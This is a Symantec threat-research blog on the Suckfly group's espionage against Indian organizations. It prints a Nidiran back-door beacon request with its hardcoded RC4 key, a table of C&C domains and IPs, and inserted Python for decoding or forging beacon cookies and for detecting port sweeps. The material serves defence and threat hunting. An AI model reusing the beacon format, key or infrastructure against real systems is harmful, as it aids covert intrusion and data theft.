# Security Response

### Indian organizations targeted in Suckfly attacks

Suckfly conducted long-term espionage campaigns against government and commercial organizations in India.

**Created: 17 May 2016 12:59:14 GMT • Updated: 17 May 2016 15:02:44 GMT • Translations available: Simplified Chinese, Japanese**

**Jon_DiMaggio**, Symantec Employee

In March 2016, Symantec published a blog on [Suckfly, an advanced cyberespionage group that conducted attacks](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates) against a number of South Korean organizations to steal digital certificates. Since then we have identified a number of attacks over a two-year period, beginning in April 2014, which we attribute to Suckfly. The attacks hit high-profile targets, including government and commercial organizations.
These attacks occurred in several different countries, but our investigation revealed that the primary targets were individuals and organizations located in India.

While there have been several Suckfly campaigns that infected organizations with the group's custom malware [Backdoor.Nidiran](https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99), the Indian targets show a greater amount of post-infection activity than targets in other regions. This suggests that these attacks were part of a planned operation against specific targets in India.

**Campaign activity in India**

The first known Suckfly campaign began in April 2014. During our investigation of the campaign, we identified a number of global targets across several industries that were attacked in 2015. Many of the targets we identified were well-known commercial organizations located in India. These organizations included:

- One of India's largest financial organizations
- A large e-commerce company
- The e-commerce company's primary shipping vendor
- One of India's top five IT firms
- A United States healthcare provider's Indian business unit
- Two government organizations

Suckfly spent more time attacking the government networks than all but one of the commercial targets. Additionally, one of the two government organizations had the highest infection rate of the Indian targets. Figure 1 shows the infection rate for each of the targets.
_Figure 1. Infection rates of Indian targets_

Indian government org #2 is responsible for implementing network software for different ministries and departments within India's central government. The high infection rate for this target is likely because of its access to technology and information related to other Indian government organizations.

Suckfly's attacks on government organizations that provide information technology services to other government branches are not limited to India. It has conducted attacks on similar organizations in Saudi Arabia, likely because of the access that those organizations have.

Suckfly's targets are displayed in Figure 2 by their industry, which provides a clearer view of the group's operations. Most of the group's attacks are focused on government or technology-related companies and organizations.

_Figure 2. Suckfly victims, by industry_

**Suckfly attack lifecycle**

One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations. In 2015, Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in India. Similar to its other attacks, Suckfly used the Nidiran back door along with a number of hacktools to infect the victim's internal hosts.
The tools and malware used in this breach were also [signed with stolen digital certificates](http://www.symantec.com/connect/blogs/keeping-your-code-signing-certificate-straight-and-narrow). During this time the following events took place:

_Figure 3. Suckfly attack lifecycle_

1. Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence for the initial target. The target's job function, corporate email address, information on work-related projects, and publicly accessible personal blog could all be freely found online.
2. On April 22, 2015, Suckfly exploited a vulnerability in the targeted employee's operating system (Windows) that allowed the attackers to bypass User Account Control (UAC) and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email was used.
3. After the attackers successfully exploited the employee's system, they gained access to the e-commerce company's internal network. We found evidence that Suckfly used hacktools to move laterally and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With those credentials, the attackers were able to log in as the victim and navigate the internal corporate network as though they were the employee.
4. On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols (alternate HTTP/proxy and VNC respectively), but can be abused by attackers when those services are not secured.
   It isn't clear why the attackers scanned for hosts with port 40 open, because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it's clear that the group was looking to expand its foothold on the e-commerce company's internal network.
5. The attackers' final step was to exfiltrate data from the victim's network to Suckfly's infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information.

These steps were taken over a 13-day period, but only on specific days. While tracking which days of the week Suckfly used its hacktools, we discovered that the group was only active Monday through Friday. There was no activity from the group on weekends. We were able to determine this because the attackers' hacktools are command-line driven, so their execution times show when the operators were behind keyboards, actively working. Figure 4 shows the attackers' activity levels throughout the week.

_Figure 4. Signed hacktools in use against targets, by day_

This activity supports our theory, mentioned in the [previous Suckfly blog](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates), that this is a professional, organized group.

**Suckfly's command and control infrastructure**

Suckfly made its malware difficult to analyze to prevent its operations from being detected. However, we were able to successfully analyze Suckfly malware samples and extract some of the communications between the Nidiran back door and the Suckfly command and control (C&C) domains.

We analyzed the dropper, which is an executable that contains the following three files:

1. dllhost.exe: The main host for the .dll file
2. iviewers.dll: Used to load encrypted payloads and then decrypt them
3. msfled: The encrypted payload

All three files are required for the malware to run correctly. Once the malware has been executed, it checks whether it has a connection to the internet before running. If the connection test is successful, the malware runs and attempts to communicate with the C&C domain over ports 443 and 8443. In the samples we analyzed, the port and C&C information were encrypted and hardcoded into the Nidiran malware itself. The Nidiran back door made the following initial request to the Suckfly C&C domain:

```http
GET /gte_ok0/logon.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: REDACTED
Connection: Keep-Alive
Cookie: dfe6=OIAXUNXWn9CBmFBqtwEEPLzwRGmbMoNR7C0nLcHYa+C1tb4fp7ydcZSmVZ1c4akergWcQQ==
```

The User-Agent string imitates Internet Explorer 6 on Windows XP (Windows NT 5.1), which is itself a useful hunting pivot in proxy logs where such a client should no longer appear. The interesting information transmitted to the C&C server in the initial request is in the cookie, which is comprised of the following:

```
[COOKIE NAME]=[RC4 ENCRYPTED + B64 ENCODED DATA FROM VICTIM]
```

The key for the RC4 encryption in this sample is the hardcoded string "h0le". Because the key is static and recoverable from the sample, the scheme provides obfuscation rather than confidentiality: anyone holding the key can decrypt every beacon sent with it.
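The cookie scheme just described, worked through as an added example (this is not Symantec's code and not Nidiran's): RC4 under the key "h0le", then base64, carried in a `name=value` cookie on a `GET /gte_ok0/logon.php` request. The request, the cookie name `dfe6` and the URI come from the sample above; the victim-profile plaintext layout (`network|hostname|ip|os`), the host names and the IP addresses are constructed for the example, since the blog only lists which fields the decrypted data contains.

```python
"""Decode a Nidiran-style beacon cookie: value = base64(RC4(key, victim_data)).

Added example, not code from the blog or the malware. The plaintext field
layout below is an assumption; the blog says only that the decrypted data
carries network name, hostname, IP address and OS information.
"""
import base64

RC4_KEY = b"h0le"                    # hardcoded key reported in the sample
BEACON_PATH = "/gte_ok0/logon.php"   # initial request URI from the sample


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypting and decrypting are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def encode_cookie(name: str, plaintext: bytes, key: bytes = RC4_KEY) -> str:
    """Build a cookie pair the way the blog describes it: RC4, then base64."""
    return f"{name}={base64.b64encode(rc4(key, plaintext)).decode()}"


def decode_cookie(cookie_header: str, key: bytes = RC4_KEY) -> dict:
    """Return {cookie_name: decrypted_bytes} for every base64 name=value pair."""
    result = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if not sep:
            continue
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:        # binascii.Error is a ValueError: not base64
            continue
        result[name] = rc4(key, raw)
    return result


def parse_beacon(raw_request: str, key: bytes = RC4_KEY):
    """Return decrypted cookie payloads if the request matches the beacon shape,
    else None. Matches on method + URI, then decrypts every cookie present."""
    lines = raw_request.strip().splitlines()
    parts = lines[0].split()
    if len(parts) < 2 or parts[0] != "GET" or parts[1] != BEACON_PATH:
        return None
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    if "cookie" not in headers:
        return None
    return decode_cookie(headers["cookie"], key)


def profile_fields(payload: bytes) -> dict:
    """Split the (assumed) 'network|hostname|ip|os' layout into named fields."""
    net, host, ip, os_name = payload.decode(errors="replace").split("|", 3)
    return {"network": net, "hostname": host, "ip": ip, "os": os_name}


# Constructed victim profile and request; hostnames/IPs are invented.
SAMPLE_PROFILE = b"CORPNET|WS-FIN-0042|10.20.30.41|Windows 7 SP1 x86"
SAMPLE_REQUEST = (
    "GET /gte_ok0/logon.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: example.invalid\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: " + encode_cookie("dfe6", SAMPLE_PROFILE) + "\r\n"
)

if __name__ == "__main__":
    decoded = parse_beacon(SAMPLE_REQUEST)
    print(profile_fields(decoded["dfe6"]))
```

Run against a real capture, `parse_beacon` only needs the raw request text; if the key differs between samples, pass it explicitly. The cookie value printed in the blog is not decoded here because the real plaintext layout is not given, so the example round-trips its own constructed profile instead.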
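Returning to the two lifecycle signals described in the attack section above, the April 27 sweep for ports 8080, 5900 and 40 and the Monday-to-Friday pattern in hacktool execution, here is an added example of hunting for both in host and network telemetry. It is not Symantec's code, and the flow-log and process-log formats, host names, IP addresses and tool file names are all constructed for the example; the ports, the dates and the weekday conclusion are the blog's.

```python
"""Hunt for a port sweep on 8080/5900/40 and profile operator activity by weekday.

Added example, not code from the blog. Log formats are constructed:
  flow line:    "<iso-ts> <src-ip> <dst-ip> <dst-port> <flag>"
  process line: "<iso-ts> <hostname> <image-name>"
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

SCAN_PORTS = {8080, 5900, 40}    # ports Suckfly probed on April 27, 2015
MIN_DISTINCT_DSTS = 5            # distinct peers one source must touch ...
WINDOW = timedelta(minutes=10)   # ... within this window to count as a sweep
DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]


def parse_flow(line: str):
    ts, src, dst, dport, flag = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flag


def detect_scans(flow_lines) -> dict:
    """Return {src: set_of_peers} for sources that reach >= MIN_DISTINCT_DSTS
    distinct hosts on SCAN_PORTS inside WINDOW. Alerting on the ports alone
    would drown in proxy (8080) and VNC (5900) traffic; the distinct-peer
    threshold is what separates a sweep from normal use."""
    per_src = defaultdict(list)
    for line in flow_lines:
        ts, src, dst, dport, _ = parse_flow(line)
        if dport in SCAN_PORTS:
            per_src[src].append((ts, dst))
    hits = {}
    for src, events in per_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):      # sliding window start
            peers = {d for t, d in events[i:] if t - t0 <= WINDOW}
            if len(peers) >= MIN_DISTINCT_DSTS:
                hits[src] = peers
                break
    return hits


def activity_by_weekday(exec_lines) -> dict:
    """Count hacktool executions per weekday, as the blog did for Figure 4.
    Timestamps are used as given: convert to the operators' suspected local
    zone first, or a late-Friday UTC burst lands on Saturday."""
    counts = Counter()
    for line in exec_lines:
        ts, _host, _image = line.split(maxsplit=2)
        counts[DAYS[datetime.fromisoformat(ts).weekday()]] += 1
    return dict(counts)


# Constructed flow log: one host sweeps six peers on all three ports within
# five minutes, plus benign proxy and VNC traffic that must not trigger.
FLOW_LOG = [f"2015-04-27T11:3{n}:00 10.20.30.41 10.20.30.{n + 1} {p} S"
            for n in range(6) for p in (8080, 5900, 40)] + [
    "2015-04-27T09:00:00 10.20.30.50 10.20.1.10 8080 S",   # user via proxy
    "2015-04-27T09:00:05 10.20.30.51 10.20.1.10 8080 S",   # user via proxy
    "2015-04-27T13:00:00 10.20.30.9 10.20.30.77 5900 S",   # admin VNC session
]

# Constructed process log (image names are placeholders, not Suckfly tools);
# dates fall inside the blog's April 22 to May 4, 2015 window, all weekdays.
EXEC_LOG = [
    "2015-04-22T10:14:00 WS-FIN-0042 dropper.exe",
    "2015-04-22T10:20:00 WS-FIN-0042 credtool.exe",
    "2015-04-23T09:02:00 WS-FIN-0042 credtool.exe",
    "2015-04-27T11:30:00 WS-FIN-0042 scantool.exe",
    "2015-04-28T15:45:00 SRV-APP-03 scantool.exe",
    "2015-05-04T16:10:00 SRV-APP-03 dropper.exe",
]

if __name__ == "__main__":
    for src, peers in detect_scans(FLOW_LOG).items():
        print(f"sweep from {src}: {len(peers)} peers on {sorted(SCAN_PORTS)}")
    print(activity_by_weekday(EXEC_LOG))
```

Feed `detect_scans` a day of flow records sorted or not (it sorts per source) and tune `MIN_DISTINCT_DSTS` and `WINDOW` to the network; `activity_by_weekday` takes the execution events of whatever signed hacktools the investigation has already identified, not every process on the host.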
Once the cookie data is decrypted, Suckfly has the victim's network name, hostname, IP address, and operating system information.

Information about the C&C infrastructure identified in our analysis of Suckfly activity is shown in Table 1.

|Domain|Registrant|IP address|Registration date|
|---|---|---|---|
|aux.robertstockdill[.]com|kumar.pari@yandex[.]com|Unknown|April 1, 2014|
|ssl.2upgrades[.]com|kumar.pari@yandex[.]com|176.58.96.234|July 5, 2014|
|bss.pvtcdn[.]com|registrar@mail.zgsj[.]com|106.184.1.38|May 19, 2015|
|ssl.microsoft-security-center[.]com|Whoisguard|Unknown|July 20, 2015|
|usv0503.iqservs-jp[.]com|Domain@quicca[.]com|133.242.134.121|August 18, 2014|
|fli.fedora-dns-update[.]com|Whoisguard|Unknown|Unknown|

_Table 1. Suckfly C&C infrastructure (domains defanged with [.])_

**Conclusion**

Suckfly targeted one of India's largest e-commerce companies, a major Indian shipping company, one of India's largest financial organizations, and an IT firm that provides support for India's largest stock exchange. All of these targets are large corporations that play a major role in India's economy. By targeting all of these organizations together, Suckfly could have had a much larger impact on India and its economy.
While we don't know the motivations behind the attacks, the choice of commercial targets, together with the government targets, may point toward an economic motive.

Suckfly has the resources to develop malware, purchase infrastructure, and conduct targeted attacks for years while staying off the radar of security organizations. During this time it was able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations. There is no evidence that Suckfly gained any direct benefit from attacking the government organizations, but someone else may have benefited from these attacks.

The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on its own. We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly's operations.

**Protection**

Symantec has the following detections in place to protect against Suckfly's malware:

Antivirus

- [Backdoor.Nidiran](https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99)
- [Backdoor.Nidiran!g1](http://www.symantec.com/security_response/writeup.jsp?docid=2015-120200-0342-99)
- [Hacktool](http://www.symantec.com/security_response/writeup.jsp?docid=2001-081707-2550-99)
- [Exp.CVE-2014-6332](https://www.symantec.com/security_response/writeup.jsp?docid=2014-111313-5510-99)

Intrusion prevention system

- [Web Attack: Microsoft OleAut32 RCE CVE-2014-6332](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28032)
- [Web Attack: Microsoft OleAut32 RCE CVE-2014-6332 2](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27813)
- [Web Attack: Microsoft OleAut32 RCE CVE-2014-6332 4](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=70116)
- [Web Attack: OLEAUT32 CVE-2014-6332 3](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28890)
- [System Infected: Trojan.Backdoor Activity 120](https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28977)

©2016 Symantec Corporation